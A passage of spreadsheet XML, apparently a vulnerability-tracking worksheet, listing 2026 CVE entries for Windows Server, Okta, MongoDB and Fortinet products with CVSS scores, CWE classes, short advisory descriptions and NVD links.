      <c r="D94" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69813</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69858</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69858</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69989</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69989</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70342</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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7" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway improperly handles input sanitization and regular expression evaluation within its Protected Rule authorization check, resulting in an authorization bypass when an administrator has explicitly configured a Protected Rule policy on one or more application resources.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>A heap out-of-bounds read security issue exists in the query planning component of MongoDB Server. An authenticated user with database read and write privileges can trigger the security issue through crafted query operations, causing the server to read memory beyond allocated buffer boundaries. The revealed memory contents may be partially observable through diagnostic query statistics output.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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6" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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7" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K10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8" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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09" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr">
        <is>
